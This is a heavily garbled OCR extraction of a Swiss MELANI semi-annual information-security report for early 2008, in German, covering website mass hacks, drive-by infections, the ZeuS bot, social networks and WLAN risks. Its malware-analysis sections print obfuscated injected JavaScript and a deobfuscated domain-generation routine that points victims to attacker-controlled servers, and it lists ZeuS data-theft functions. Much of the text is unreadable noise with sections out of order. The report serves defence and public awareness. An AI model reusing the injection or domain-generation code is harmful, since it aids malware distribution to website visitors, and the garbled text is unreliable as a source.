PDF, 1004 KB
Contents
1. ppqr Irfuygigtw Sl d z7bagat Liwl yinp atarsichp e2SSF4 q ai 2 rLuyg IPPbn22 0ch 34h 224257Ich2 53h 2522442 Eer N25Ihr2564cr2573 1256412561 252br2564br252b5r256442563r2525r2564dr 2SADePSS4eh2 520142530 LISI 256442577 4257312574 K25IHH257IH25741253d4r2 538 2522t2SIbt22 bn 3122411 Ae ein Ae TE Ae ah Aer Th ICTS Th ICT T dog ugOCbhgs HIch2522r Ic Mt Aen Aen d Bh een Aen d Ae 8 Ae P Tab0d ugDXbhgrn fer 0 TqdubSed K717N t SJevudVe LuqhOs yvOt N JewudTqi69 69d Kit IRC s JewudTedus9s Idar t JevudTqi D n d i en deen Ain ZZ S Jhar3254J0 N T IA OWENTER EE ETIKETT NA delen dek 564w t2564CI42528Cu 425314 dh leed eeh 11 256L125Ge cek2S28cs2S7a 2572et 2575rnt25206125611252bebr2563r256 41256Idre42565 0r2570 125Ipr 22 1 59r 56 dr fer 7St Gdent 74 t GIOt CLR 65 n Een d i ZENZ 7vbuls Geh Stin a Ghul es CGqus iren 3dr27 dn Id 1 Inc 33 Tuba Gos Geen 7414 den Sien ia Taart 653346927 832 7 Ibl 65var c I PSness Clapes Odzes 63245 GE ba 73974 e274 377 AY ieren OGHA TIt ISIDI ie la Tei 8248 Ae Ah 7 funct Lann 208 FIC cs Cem Zen 76 eg n ovart ext 643 dnev d er 65 73 b eg ni 6STD dien 6S ex 864 8678 6St444a8 74e iben 54 t Ibdot 63 umes Get sGJoosSbiesIdcnmi2h 427124427 escas We ten Zen 7k been 0 Ee 738 3d42 Trexd COGN 5454 69ngy28 4 3b 74 zeval unescape document write Cane G nk Geet A3 ff 1646473 8642 et 73 dt TIN Abu Geen 7Ict6ip dam 2gbO ugdGb2. eve sdyt 7F OS Ot lt lt i9kfqhOb 8881 881 t9910 Nt9 892 C9 budeb Cbemtqnor 72uc t TFA TF rte e Ben eet ges 1iF pa K7 RB PSONSINOMeyvESSd KITIN 8229 82096659 Ki 7M 229 PPCSx RSG Ei RO 8 2O9Meu CuNTSx Rad KIT 7M 69504122 PnA I gt bu 1osu t L n ii 1 Sx 19x EESK j Kd EI The IR Pav 77 794 ch e 1642 t Ibsees Jats ds 70890827827 for 24300 is Iods cen s dzo S Sul Gel EIciovGe VG4wt2ZOr VEIQNIGEZTTVZSE4N2 SELVZSEI ued 2 SGet NZ STE SEA S 4252242 77ceH Aa 2742522 4275 Ch An Zi SJoscrvZSEMZS70c 4256cah2361 65gh2571 5a N256r 7er25IAr 255012 563224 aan 76ar257Ich 724 St ZS 7TOCVTSSce2Z 2262 S3eb27 cok DANI M2SIct2 SHot2 Sl Lack ips 7442 Sien r evals2Ounert heen 70465 LH Z 2 7a 5 cad Ian TAVLDE SIN TALENT fri OLY CACY 6 eee emm e lolxl war lip bt cue pih4g mra gt giv x m ti ppar Stas TIES A 44 Fdats Ibs 64er 23 4 649 61 an tae uN jeva Ver eyel H arat azb AaS haed F software hart onal mainla D S Ieeh DE dree TE 76737942 qHO N hoanehanes Pease Resmrrchocarinclons cotane E ett pre eu Tqdu 9 d K717H c gt wudVe Zugb 9eyv r gt wudTqi8s 9d KTETR T hot Shaved Fokfer actware aut unakzila matla 0 9 2p105 eval_ Jegen 007 tog 0420 ORS K71700 0922420320 m 1 3 pa KT TEKA K7 Moa K7ATMB ISK 1 11 KOBA K7A THES ZOWIOP I GSOKSHHPSONZ2 M4 iSx322 KOSSSd KV Re gt wudTgdu 9 9r gt wudTqi89 4229eu j cu
3. ge diesbez glich jedoch anders Laut Bundesgesetz betreffend die berwachung des Post und Fernmeldeverkehrs B PF ist eine Internet Anbieterin eine Fernmeldedienstanbieterin oder der Teil einer Fernmeldedienstanbieterin die der ffentlichkeit fernmeldetechnische bertragungen von Informationen auf der Basis der IP Technologien unter Verwendung ffentlicher IP Adressen anbietet Da Funknetzwerke in der Regel nicht aus ffentlichen 21 Siehe http www csmonitor com 2005 1004 p07s01 woeu html Stand 11 08 2008 2 Art 2 lit a Verordnung ber die berwachung des Post und Fernmeldeverkehrs VUPF MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international sondern aus privaten IP Adressen bestehen sind Schweizer Firmen oder Organisationen welche Netzwerke mit privaten IPs anbieten demnach nicht an das B PF und die entspre chende Verordnung gebunden Dass es jedoch einfache M glichkeiten gibt einen Beitrag f r die Sicherheit zu leisten zeigt beispielsweise das WLAN Projekt von Energie Wasser Lu zern Ihr Gratis WLAN Angebot kann nur erreichen wer sich vorher mittels SMS registriert Eine weitere Problematik zeigt sich in den so genannten WLAN Prepaid Karten grosser Te lekom Provider welche einen anonymen Zugang zu WLAN Hotspots erm glichen Diese Problematik erinnert an die Registrierungspflicht f r Prepaid Mobiltelefonie die auch lange gefordert wurde und schliesslich
4. 27 27 function 20 73c c 6em 2c 76 eed 29 7bvar 20ex 64 3dnew 44at 65 6 5xd a 73 65t D 61 t 6 55q ex 64 67 65t 44a 74e 2be 64 3bdo 63ume 6et 6300 6bie 3dcnm 2b 27 3d 27aeesca 70e v W 29 27 3 beaer43gfhsrmx 70ire 73 3sd 27 exd t0 12GM 5afuqq 34 58 witz A wa4Str 69ng 28 3b 7d seval unescape document write lt script gt lt body gt Abbildung 2 Auszug HTML Code und JavaScript Exploit Die eigentliche Malware ist nicht direkt in diesen Daten abgelegt stattdessen finden sich darin Browseranweisungen die Malware von einem anderen durch die Kriminellen kontrol lierten Server zu beziehen Die Angreifer nutzen dazu einen versteckten HTML iFrame Tag 46 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international siehe Abbildung 1 Der DNS Name des Ortes dieser Datei wird dynamisch generiert und wechselt zweimal w chentlich Im Beispiel auf Abbildung 3 unten ist dies http annvxes com Auf diese Weise kann die Malware zentral an einem oder wenigen Orten abgelegt werden w hrend die Verteilung dezentral durch zahlreiche kompromittierte Webseiten erfolgt Ein solches Vorgehen erh ht aus Sicht der Kriminellen die Flexibilit t vereinfacht die Wartung und senkt das Entdeckungsrisiko Ausserdem k nnen bei diesen zentralen Verteilseiten zu s tzliche Filter zur Verteilung der Malware implementiert werden z B um die Infektion auf bestimmte L nder zu besch
5. a 2 2 0 9 vea com July t com February a a 2 a s 0 August ep March a z z a z Is com Septenber ta ir com Nay a z z a z a z 0 com October ta if com April a z a z a z y com November a z a z z a 2 0 9 xes com June a t a 2 a 2j a z 0 Sjrve com December MELANI Halbjahresbericht 20091 12 day Sunday Monday Tuesday or Wednesday tS a a9 getdate d gt getDay 3 gettate values from 1 to 31 4 to 6 2 values from I to 27 else tO 4 49 gecDare 49 geeDay day from 1 co 21 te 3 values fros
6. erfolgt ein Screenshot in dem Bereich des Bildschirms in dem die linke Maus taste gedr ckt wurde Erhalt von Zertifikaten aus dem MY Speicher Zertifikate mit dem Ver merk nicht exportierbar werden nicht korrekt exportiert und dessen Leerung Danach wird jedes beliebige importierte Zertifikat auf dem Server gespeichert 13 Abfangen von Logins Passw rtern der Protokolle POP3 und FTP unabh ngig vom Port und Auf zeichnung derselben im Log nur bei erfolgreicher Autorisierung 14 nderung des lokalen DNS L schung Erg nzung der Aufzeichnungen in der Datei system32 d h Vergleich der angegebenen Domain mit der angegeben IP f r WinSocket 15 Speichert den Inhalt des Protected Storage beim ersten Starten auf dem Rechner 16 L scht Cookies aus dem Cache des Internet Explorers beim ersten Starten auf dem Rechner 17 Suche per Suchmaske von Dateien auf logischen Laufwerken oder Download einer konkreten Da tei 18 Aufzeichnung k rzlich besuchter Seiten beim ersten Starten auf dem Rechner N tzlich bei Installa tion durch Sploits wenn Sie den Download bei einem zweifelhaften Service erwerben k nnen Sie so erfahren was parallel noch geladen wird 19 Real time Screenshot vom Rechner des Opfers der Rechner muss sich ausserhalb der NAT befin den 20 Empfang serverseitiger Befehle und R cksendung von Berichten ber deren erfolgreiche Ausf h rung Derzeit Starten lokaler entfernter Dateien sofortige Aktuali
7. 5 6 7 8 9 var t9 new Array var d9 new Date t9 y d9 getFullY ear if d9 getDay gt 3 t9 d d9 getDate d9 getDay 2 else t9 d d9 getDate d9 getDay if t9 d lt 0 t9 d 1 t9 m J d9 getMonth 1 function CMN d m y var r y 3 d md 3 d return r var d veslox com va yCh1 yCh2 mCh dCh mNm if t9 y lt 2007 t9 y 2007 mNm CMN t9 d t9 m t9 y yCh 1 19 t9 y J amp OxAA mNm 63 26 yCh2 19 t9 y amp 0x331 1 gt gt 3 mNm 10 mCh 9 t9 m mNm 25 if t9 d 2 gt 0 amp amp t9 d 2 lt 9 dCh n9 t9 d 10 else dCh I9 t9 d 6 27 replace d yCh2 mCh yCh1 dCh m9 t9 m 1 com Der letzte Teil ist dabei am interessantesten Nach einer Reformatierung wird der letztlich benutzte deobfuskierte JavaScript Code zur Generierung der dynamischen DNS Namen ersichtlich es wurden einige Kommentare manuell eingef gt Malzilla by bobby Download Decoder misc Decoders Log Ciphoard Monitor Notes Hex view PScret Tools Settings Abou New Tab 1 var nS new Array uno dve thr fir vift xes ves ght eni etn lev twe 3 war i9enew Array a b c e Lg thts at tat tn Pad hel he ea ed Se a ya var aSenew Array 1 2 9 5 6 7 0 9 var Oenew Array var new Datei est y a9 getFullvear OU 7 get current year Some calculations with the current day if d9 gerDay gt gerday
8. Installation kann bis zu einer Minute dauern die L nder Datenbank nach IP Nummern wird gef llt 7 Falls die Installation erfolgreich war k nnen Sie das Verzeichnis install l schen und direkt ins Steuerungspanel gehen Falls bei der Installation Fehler auftreten pr fen Sie die Richtigkeit der Da teneingabe evtl sollten die Einstellungen von PHP und MySQL berpr ft werden dar ber hinaus k nnen Sie sich an den technischen Support von ZeuS wenden Konfiguration Die Entwickler haben die Konfiguration in einen statischen und einen dynamischen Bereich aufgeteilt Im statischen Teil befinden sich Parameter wie ein Timer und die URL f r die Er neuerung der Konfigurationsdatei Der dynamische Teil enth lt Parameter welche die Ro bustheit des Netzes sichern und einen schnellen Wechsel allf lliger Angriffsziele erm gli chen sollen Hier findet man zum Beispiel die URLs von welchen aus aktualisierte Versionen herunter geladen und installiert werden k nnen auf Wunsch auch an verschiedenen Orten Backup Wird eine der Adressen entdeckt und durch die Polizei geschlossen so nutzt der Bot eine alternative Adresse und l dt dann eine aktualisierte Version nach Hier findet sich auch die URL unter der die gestohlenen Daten gespeichert werden Dropbox sowie die alternativen URLs unter denen der Download der Konfigurationsdatei m glich ist Schliess lich findet man hier auch die Datei mit den Webinjects siehe weiter unten Die D
9. Jahr 2003 zur ck wurde der Aufbau der erforderlichen Infrastruktur Ende Marz 2008 abgeschlossen und erfolgreich getestet Mit Mobile Unlimited Karten kann bereits seit einiger Zeit auch im Zug im Internet gesurft werden Dazu ist jedoch ein spezielles Abo mit einer entsprechenden PCMCIA Karte not wendig Eine WLAN Karte sowie ein 1 Klass Billet vorausgesetzt kann mit dem neuen An gebot nun jeder ohne grossen Aufwand im Zug online gehen Neben der Abrechnung via Handy gibt es auch anonyme Prepaid Angebote Die Problematik solcher Angebote ist in Kapitel 6 beschrieben ICANN Schaffung neuer Top Level Domains Anl sslich des 32 Meetings in Paris hat die Internet Corporation for Assigned Names and Numbers ICANN beschlossen ein standardisiertes Verfahren zur Einrichtung neuer Top Level Domains TLD zu schaffen Voraussichtlich bereits ab dem 2 Quartal 2009 kann sich grunds tzlich jedermann um die Verwaltung einer Dom ne Endung bewerben Auch TLDs mit kyrillischen oder chinesischen Schriftzeichen werden ab diesem Zeitpunkt m glich sein Zuvor hat der russische Pr sident Dimitri Medwedew daf r geworben dass auch kyrillische TLDs zugelassen werden da Russisch im Vergleich zu der englischen Sprache im Internet an Bedeutung verliert Die ffnung f r neue Dom ne Namen wurde zum Abschluss einer wochenlangen Konferenz in Paris einstimmig beschlossen Nun werden Regeln f r die Li zenzvergabe entwickelt Innerhalb eines besch
10. Lieferant dienen Um einen professionellen und gezielten Social Engineering Angriff zu lancieren betreiben Kriminelle im Vorfeld eine detaillierte Recherche im Internet Soziale Netzwerksei ten welche zahlreiche und vielf ltige Informationen wie Job Position E Mail Adresse Ge sch ftspartner Hobbies und dergleichen enthalten bieten daf r eine besonders ergiebige 10 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Quelle E Mails welche mit einer Malware infiziert sind lassen sich somit glaubwurdiger ges talten Auch Phishing E Mails lassen sich dadurch gezielter formulieren Besonders fur Fir men sind solche gezielten Angriffe problematisch Nutzer sollten zudem vorsichtig sein wenn sie Einladungen zu weiteren Netzwerken erhalten Hinter Einladungen von Unbekann ten k nnen sich Kriminelle und Spammer verstecken welche es bloss auf das Sammeln pers nlicher Daten abgesehen haben Soziale Netzwerke werden oft wie eine Art zweite Welt empfunden Viele Nutzer geben im Internet pers nliche Informationen preis welche sie in der realen Welt lieber f r sich be halten w rden Diese gef hlte Community kann jedoch t uschen Nutzer sind sich oft nicht bewusst dass pers nliche Angaben sowie Fotos und Filme welche einmal im Internet ver ffentlicht sind dies auch bleiben werden Zudem k nnen pers nliche Angaben im Inter net auch genutzt werden um f r gezielte Werbe
11. N DewedTGiO9 VT CUTZ Ces IONTEVTSSIBaTVT SAD ON 2544112374 VISIO VLSLOVISI POUL SPORT SHCONIS2 Pees VISIG INTZ Cee Dan 1212 SSPE Rs PER E AEEA AET RE 970 VEER TT TH RB ETAGE SIGVISITVTSE4w VT AT TEE TTT TT CH NESASCANTSALAT She CEVTHEHevl Sa HLSPlet VES PSemHTSLOCeLIS Afen I S in Bien ech ech Stas eLSIDVIIPVEPAEE L ntgen TS er A GERAN ES t AODAN Eos EEN DONT HULU oh Es TA im Nahe Agut fret INT SIR Da 1 Im NE Tea Kod Cows 1448 Ged SU PA Ege PSr ESN I 492 T IEA Coe Sdent TEnews Sdaped aa dite En DATIN PA AT Hd TT Gd Peres SSL en THe HEINE TI Le in Dein an TIGHT VST I Lumet A n n Te fos tegen Zen TE eG TOs rvar Zeen EAS Daneu SAGO NET Iris STINSON EIEN ES om 64 0 OTN ET THe bh O4 N DEn ah at N tion bien Dann TD KIT INT anna Deg Ten Ze NEIN TheMs POLLEN TDS PGND I eend COCR S400 es 60mg 20 ws ds eva umeoceze 1 1 Gocwmnent webte 1 lt aceipt gt 4 a E tomate Der Script wird an den Decoder geschickt und nach einigen manuellen Korrekturen href location und callee String im Emulator ausgef hrt die eval Resultate k nnen danach doppelgeklickt werden eval results host4Shared Folders softwareaudit malzilla malzilla 0 9 3pre5 eval 3 f20c5d3 4 37 Diese Analyse wurde von Adrian Leuenberger von Compass Security durchgef hrt 49 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international FOPNGIaTIGIIIVTHGSus2 S ectit25 fn 325
12. Neu muss der Fokus auf den Schutz der Infor mation gelegt und vom ausschliesslichen Schutz der Computer und Netzwerke auf denen die Informationen lagern abgesehen werden Dies wird ein verst rktes Informations und Datenmanagement Informationsklassifizierung und dergleichen nach sich ziehen Zudem wird eine klare Risikoabw gung vorausgesetzt die dazu f hren muss dass die Sicherheit 6 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international von Verteilkanalen Zugriffsrechten und Speicherorten dem tatsachlichen Wert einer Informa tion angepasst werden Nicht jeder Kanal oder Speicherort ist gleich sicher und nicht alle Dokumente sind in einem Betrieb gleich sensibel Damit wird die Informationssicherung in den gesch ftlichen und strategischen Risikomanagement Prozess eingebunden Ein solcher Ansatz kann allerdings nur dann Erfolg versprechend sein wenn die Informati onssicherung auch wirklich zu einem integralen Bestandteil des Sicherheitskonzeptes und somit auf der gleichen Stufe angesiedelt wird wie beispielsweise Geb ude und Personen schutz Finanzcontrolling und andere 2 2 Massenhacks legitimer Webseiten Die Gefahr einer Infektion ber Webseiten mittels Drive By Infektion w chst rasant Seit Ja nuar 2008 sind verschiedene Massenhacks auf Webseiten beobachtet worden welche be absichtigt haben deren Besucher zu infizieren Darunter befinden sich auch Webseiten mi
13. Routern W hrend die internen Ger te innerhalb eines Netzwerks zur Verf gung stehen und vom Internet aus schwieriger anzugreifen sind verbinden handels bliche Gate way Ger te das Heimnetzwerk mit dem Internet Werden diese Ger te in mittleren und gros sen Unternehmen verwendet werden sie von professionellen Firewall und Router Spezialisten unterhalten Heimanwender hingegen m ssen ihre Ger te blicherweise selbst installieren und unterhalten Wenn diese Ger te erst einmal installiert sind werden sie oft st ndig laufen gelassen ohne kontrolliert zu werden Diese Zug nglichkeit macht sie f r An greifer interessant Ein erfolgreicher Angriff kann dann unter Umst nden den vollen Zugang zu der von diesen Ger ten kontrollierten Bandbreite erm glichen Konsumenten sollten sich bewusst sein dass in diesen Ger ten blicherweise funktionsf hige Betriebssysteme vorin stalliert sind Die Betriebssysteme werden serienm ssig produziert und haben Standardein stellungen wie Administrator Passworte die den Hackern bekannt sind Der Missbrauch von Standardpassw rtern ist seit Langerem ein bekanntes Problem H Symantec hat Anfang dieses Jahres die ersten F lle von Drive by Pharming festgestellt Mit dieser neuartigen Malware Attacke kann allein durch das Ansehen einer Webseite mit eingebettetem Schadcode ein Home Router so manipuliert werden dass er bei der Eingabe einer bestimmten URL den User auf eine gef lschte Seite umleitet Die
14. am 1 Juli 2004 eingef hrt wurde Eine Motion ber eine Registrierungspflicht von Wireless Prepaid Karten analog zu den Prepaid Mobiltelefonkarten ist derzeit h ngig Immer und berall erreichbar zu sein wird zusehends zur Normalit t Im Bereich der Funk verbindungen spielt WLAN eine immer wichtigere Rolle Gerade im Hinblick auf die Einf h rung des iPhones und anderen Handys mit WLAN Zugang d rfte diese Art von Kommunika tion weiter an Beliebtheit gewinnen Zudem ist es heute ohne grosse Kosten m glich eine Internetverbindung sei es ber Kabel oder ber Funk mehreren Personen zur Verf gung zu stellen Im Gegensatz zum Kabel ist jedoch die Reichweite bei Funkverbindungen erheb lich Gerade im Bereich der R ckverfolgbarkeit gibt es zwischen privaten und konzessio nierten Anbietern grosse Unterschiede Es sollte jedoch im Sinne eines jeden Funknetzwerk Nutzers sein das eigene Netz sauber zu halten Ein korrekter Schutz verhindert dass das Netz von fremden Personen missbraucht werden kann und eine korrekte Zuordnung einer IP Adresse im Falle einer Straftat spielt eine wichtige Rolle um die Internet Kriminalit t er folgreich zu bek mpfen 7 Aktivit ten Informationen 7 1 Staatlich Deutschland Debatte betreffend Online Durchsuchungen geht weiter Ende Februar 2008 hat das Bundesverfassungsgericht in Deutschland entschieden dass Online Durchsuchungen nur unter strengen Auflagen zul ssig sind Das n
15. beobachtete An griffsmethode setzt nicht einmal voraus dass der Angreifer ein Administrator Passwort erra ten muss Es ist davon auszugehen dass auch handels bliche Ger te zunehmend von Kriminellen angegriffen werden Gegenw rtig gibt es Anzeichen daf r dass diese sich nebst infizierten Spam E Mails und Drive by Infektionen zu einem dfritten attraktiven Weg zur Verbreitung von Malware entwickeln Konsumenten werden sich hier nicht mehr vollst ndig auf die Hersteller verlassen k nnen Bei jedem Kauf sollten sie ihre Ger te vor dem Gebrauch pr parieren indem sie diese beispielsweise von einem Antiviren Scanner pr fen lassen oder die Stan dardeinstellungen Passworte etc ndern Siehe z B http www indiana edu phishing papers warkit pdf sowie http www symantec com avcenter reference Driveby Pharming pdf Stand 23 01 2008 3 https forums symantec com syment blog article message uid 305989 Stand 23 01 2008 iu https forums symantec com syment blog article blog id emerging amp message id 94 amp jump true M94 Stand 23 01 2008 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international 4 Aktuelle Lage IKT Infrastruktur national 4 1 Pannen Vertrauliche Daten zu Schengen auf EJPD Webseite ver ffentlicht Auf der Webseite des Eidgen ssischen Justiz und Polizeidepartements EJPD war verse hentlich drei Wochen lang ein Dokument mit vertrauli
16. m I ppaz Orturg gte j Sr sul yanprats dep Sitiga 1 frtztrtegagr ipibrrz DOE EE TEE 6408 KEIER Se 214 J0 HI KAKAO KA KE KEUKERT w tre AT Mee Ee ge bi 7 lt 7 T qO GHEET eh Ze eh et lt lt e fobOet ugObbq iS fie ugoTgdu bsrd K717N c gt wudVe LuqhGSeyvet gt wudTqies 9d K7t78 t gt wudTqduS St j gt wudTq 69 8229eu cu cee e Chart 430 C4eA8 74 890 8 22 7087s IOOV2 Tees 429 11 ores Ith 46944429 teh 708 Ida DIN ch GS 969 192619297 0974075 Ope W241 Jah 224 64w 3 64eas2Gcu 314 429 1227 SEOMVEGN TSNVSICIVGLVGe CHkZGch 7a ier 7SrntZ20chsikzbebir 63s 6304 CSdecs 65er 7a 3b Iqnu r lt 13u122 13x 19x Get H2577CH69cH2565 4252242 7 ceHIAh2 742522 4277cbh3dh 2 7r25Icsert256M2570r H256cat256H65gh257r35a 25I3er27 cer dh 2712 5Icer25Scr2522acripk 74125Ier27 evalt2Bunet Zeen 70 SS tt Z n Pa gt eval unescape d cz40p a2 du dstes f4et 7 Das Script wird erneut ausgef hrt und es entsteht folgender Code Donload Decoder Misc Decoders Log inboard Monitor Notes Hex view PSc iet Toots Settings About Nowe Tab 2 ca 66ulGeotih6tn 4640 7 164s eh TI AY TIVI Gus Geek eh EE 9 TE EK E E E rr E E E E E rn nl ET TE d nr er d CT 771767 ert ef Ee a a at Wer Sx lt eSx lt yvOd K7 7M 92 ET TB CDN HE E dc Od K7t TH t gt wudTqdusS t gt wudTqi8S9 yved EICH 32094 ETC 1 d K7 P t gt wud 7F dxB9
17. n chste Halbjahr Kapitel 3 1 Pr vention Kapitel 6 e Soziale Netzwerke und die Gefahr des Datenmissbrauchs Soziale Netzwerke werden rege genutzt denn sie bieten die M glichkeit sich mit rela tiv kleinem Aufwand auf dem Internet zu pr sentieren Die Ver ffentlichung pers nli cher Daten auf dem Internet birgt jedoch auch Gefahren Sie hilft Cyber Kriminellen gezielte Angriff zu lancieren Tendenzen f r das n chste Halbjahr Kapitel 3 2 4152 MELANI Halbjahresbericht 2008 1 Informationssicherung Lage in der Schweiz und international 1 Einleitung Der siebte Halbjahresbericht Januar Juni 2008 der Melde und Analysestelle Informati onssicherung MELANI erlautert die wichtigsten Tendenzen rund um Gefahren und Risiken die mit den Informations und Kommunikationstechnologien IKT einhergehen Er gibt eine Ubersicht Uber Ereignisse im In und Ausland beleuchtet die wichtigsten Entwicklungen im Bereich der Pravention und resumiert Aktivitaten staatlicher und privater Akteure Erlaute rungen zu Begriffen technischer oder fachlicher Art W rter in kursiv sind in einem Glossar am Ende dieses Berichts zu finden Die Beurteilungen von MELANI sind jeweils farblich her vorgehobenen Kapitel 2 beschreibt die aktuelle Lage Gefahren und Risiken des letzten Halbjahres Ein Ausblick auf erwartete Entwicklungen wird in Kapitel 3 gegeben Kapitel 4 und 5 befassen sich mit Pannen und Ausf llen Angriffen Kriminalit
18. sich Zugriff auf die Datenbank des Unternehmens ver schaffen Insbesondere problematisch sind Funknetzger te welche von Mitarbeitern ohne das Wissen der IT Verantwortlichen an das Firmennetzwerk angeschlossen werden und damit einen unbekannten neuen Angriffspunkt schaffen Schlecht gesch tzte oder offene Funknetzwerke stellen zudem eine weitere Gefahr dar Kri minelle k nnen beim Begehen einer Straftat ihre IP Adresse respektiv die tats chliche Ur heberschaft verschleiern Personen die ihr Funknetzwerk nicht ausreichend sch tzen m s sen damit rechnen dass dieses f r Straftaten missbraucht wird In der Schweiz sind mehrere solche F lle bekannt Es handelt sich hierbei um Erpressungen sexuelle N tigung sowie den Download von Kinderpornographie Auf einschl gigen Internetforen wird ausdr cklich geraten solche Sicherheitsl cken auszunutzen und fremde Funknetzwerke zu nutzen Ob schon f r die Besitzer von ungesicherten Funknetzwerkes zum aktuellen Zeitpunkt keine strafrechtlichen Konsequenzen zu erwarten sind kann dies f r sie unangenehme Folgen haben Wenn im Rahmen eines Strafverfahrens die IP Adresse ermittelt wird kann dies n mlich zu einer Hausdurchsuchung f hren Alle sollten sich deshalb einige Gedanken ber die Sicherheit machen bevor sie ihre Internet Verbindung anderen zur Verf gung stellen Welche Dienste sollen zur Verf gung gestellt werden Welche Seiten sollen zugelassen werden Soll eine gewisse Zugangskontr
19. values D to 6 where O is Sunday and Saturday if tO d lt 0 at als It day is less than O set the day to i thus valid values for t9 d 0 31 is a9 getMonth 12 ensure char month is in the range 1 12 CEN takes the date an input and does some calculations vith the values function CWi d Yy t war y i d etd tS 4d Cptuscation return t var d e veslox com Destination target that is replaced in the last step var yChi yCh2 Ch dCh miles if t9 y lt 2007 t9 y 20072 ensure that the year value is equal or greater than 2007 mitre Ci c9 d cole cOt y JChie LOL 1 090 yo SOK AA miim 697 26 yChi can be any of the values of 19 a z one variable declaration vohs 190 ik tS yo On I 22 gt gt 9 emeim 10797 yCh can be any of the values of 19 Ins mch 19 tS m atim s 25 7 woh can be any of the vali of 19 a z The calculations might only restrict the usable address space So we do not take them into consideration 42 C9 a 2 gt O SEC ROL a 22 lt gt dCh im either 0 9 or s z dChenO i agin 10 5 rise dChs L t tat also 27732 Again the calcuiskions might only restrict the usable address space So we do not take them Into consideration ceplace d yCh24ch yCh1 dCh m9 t9 tm 1 com d ve slox cos is replaced by the following values ta om January 2 2
20. von Tschernobyl An diesem Tag sendete das Ra dio die Live bertragung einer Protestaktion in Minsk welche an die Not der Opfer erinnerte und sich gegen einen Erlass der Regierung zum Bau eines neuen Atomkraftwerkes aus sprach Angeblich wurde der Sender w hrend des H hepunkts der Attacke mit bis zu 50 000 Befehlen pro Sekunde berflutet Bei solchen Angriffen ist es ausserordentlich schwierig den Urheber zu identifizieren F r ein Defacement werden h ufig Proxy Bots oder andere P Verschleierungstechniken verwendet Bei DDoS Angriffen werden ebenfalls Botnetze genutzt um die Identifizierung der Urheber zu verschleiern Es kann jedoch davon ausgegangen werden dass beide dieser Attacken politisch motiviert gewesen sind Fur eine allgemeine Einschatzung zu politisch motiviertem Hacking siehe Kapitel 2 3 Domanen von ICANN und IANA gehackt Ende Juni 2008 griff eine turkische Hackergruppe Dom nen der Internet Corporation for As signed Names and Numbers ICANN und der Internet Assigned Numbers Authority IANA an und leitete diese um Dass interessante und bekannte Domanen angegriffen werden ist nichts Neues Das besondere in diesem Fall ist dass es sich bei ICANN und IANA um dieje nigen Institutionen handelt welche die Herrschaft ber Dom nen und P Adressen haben Angeblich waren mehrere Dom nen betroffen welche auf eine Webseite der Hacker umge leitet wurden Dort stand in Englisch folgender Kommentar zu lesen Ihr
21. xyz Main_Frame htm 226 963 0 953 2008 03 04 11 50 33 68 148 9 86 xyz 21 24236 sent xyz Main_Frame htm 226 0 0 0 2008 03 04 11 50 33 68 148 9 86 xyz 21 24236 sent xyz Main_Frame htm 226 0 0 0 2008 03 04 11 50 36 68 148 9 86 xyz 21 24236 created Main_Frame htm 226 0 4127 1844 2008 03 20 07 52 01 74 138 129 195 xyz 21 45992 USER xyz 331000 2008 03 20 07 52 05 74 138 129 195 xyz 21 45992 PASS 230 0 0 16 2008 03 20 07 52 38 74 138 129 195 xyz 21 45992 sent xyz index html 226 588 0 172 2008 03 20 07 52 50 74 138 129 195 xyz 21 45992 sent xyz Left_Frame htm 226 5875 0 328 2008 03 20 07 53 07 74 138 129 195 xyz 21 45992 created Left_Frame htm 226 0 6975 3515 2008 04 28 07 43 30 24 127 176 63 xyz 21 19408 USER xyz 331000 2008 04 28 07 43 34 24 127 176 63 xyz 21 19408 PASS 230 0 0 16 2008 04 28 07 44 06 24 127 176 63 xyz 21 19408 sent xyz index html 226 588 0 109 2008 04 28 07 44 20 24 127 176 63 xyz 21 19408 sent xyz Left_Frame htm 226 3687 0 234 2008 04 28 07 44 37 24 127 176 63 xyz 21 19408 created Left_Frame htm 226 0 6971 3359 Abbildung 1 Auszug der FTP Logdateien eines kompromittierten Servers Der eingeschleuste Code Um die Analyse zu erschweren wurde in diesem Beispiel der eingeschleuste Code so kom pliziert geschrieben dass er sehr schwer nachvollziehbar wird aber immer noch funktioniert Obfuskation Zur Analyse des Codes muss dieser deshalb zuerst wieder in eine nachvoll zie
22. 009 in Kraft treten Die Regierung verweist auf die Notwendigkeit Gefahren von aussen also beispielsweise terroristische oder milit rische Angriffe schneller zu erkennen Dieser Entschluss hat zu heftiger Kritik und einer grossen politischen Debatte in Schweden gef hrt Kritiker bef rchten insbesondere tiefe Eingriffe in B rgerrechte ohne ausreichende Schutz und Kontrollm glichkeiten Eine schwedische B r gerrechtsstiftung hat am Europ ischen Gerichtshof Klage eingereicht NATO Errichtung eines Zentrums f r Computerverteidigung in Estland Fast genau ein Jahr nach den Computer Attacken auf Estland haben sieben NATO Mitglieder Estland Deutschland Italien Lettland Litauen Slowakei und Spanien im Mai 2008 ein Abkommen zur Errichtung eines gemeinsamen Zentrums f r Computerverteidigung in Tallinn unterzeichnet Dieses Zentrum soll bis zu 30 Experten besch ftigen Das Hauptau genmerk richtet sich auf die Abwehr von Angriffen auf die Computernetzwerke der Mitglieds staaten Die USA werden sich als Beobachter am Projekt beteiligen und andere Mitglieds staaten werden voraussichtlich in den n chsten Jahren dazukommen Die NATO f hrt hnli che Zentren in unterschiedlichen Bereichen in verschiedenen L ndern Diese Zentren erf l len Beratungs und Forschungsfunktionen sind aber nicht direkt an Eins tzen beteiligt Ein Zentrum f r Computerverteidigung war bereits vor den Attacken gegen Estland geplant jedoch d rften
